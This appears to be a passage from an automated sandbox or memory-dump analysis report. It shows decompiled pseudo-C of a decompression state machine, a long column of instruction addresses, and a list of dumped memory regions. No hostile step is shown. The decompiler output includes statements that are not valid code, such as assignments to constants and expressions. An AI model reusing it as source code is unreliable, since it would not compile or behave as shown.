							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                0x00000000
                0x0040604c
                0x0040604c
                0x00406051
                0x004060c8
                0x004060cf
                0x004060d9
                0x004066b8
                0x004066b8
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x0040672e
                0x0040672e
                0x00406734
                0x00406734
                0x00000000
                0x00406709
                0x00406709
                0x0040670d
                0x004068bc
                0x00000000
                0x004068bc
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x00000000
                0x0040672b
                0x00406053
                0x00406053
                0x00406057
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406078
                0x0040607f
                0x00406082
                0x0040608d
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x0040609c
                0x004060ba
                0x004060bc
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062e1
                0x004062e4
                0x00406287
                0x0040628d
                0x00000000
                0x00000000
                0x00000000
                0x004062e6
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406284
                0x00000000
                0x00406284
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406190
                0x00406193
                0x0040610a
                0x0040610a
                0x00406110
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x0040621d
                0x00406220
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c0
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x0040622b
                0x0040622b
                0x0040622e
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x004063f7
                0x004063f7
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040611c
                0x00000000
                0x00000000
                0x00000000
                0x00406199
                0x004060e5
                0x004060e9
                0x00406856
                0x004068d2
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x004068ee
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406107
                0x00000000
                0x00406107
                0x00406193
                0x0040609c
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00405edf
                0x00000000
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x00000000
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x00000000
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x00000000
                0x00406424
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x00000000
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x00000000
                0x004066b5
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00000000
                0x00406828
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x00000000
                0x0040667d
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
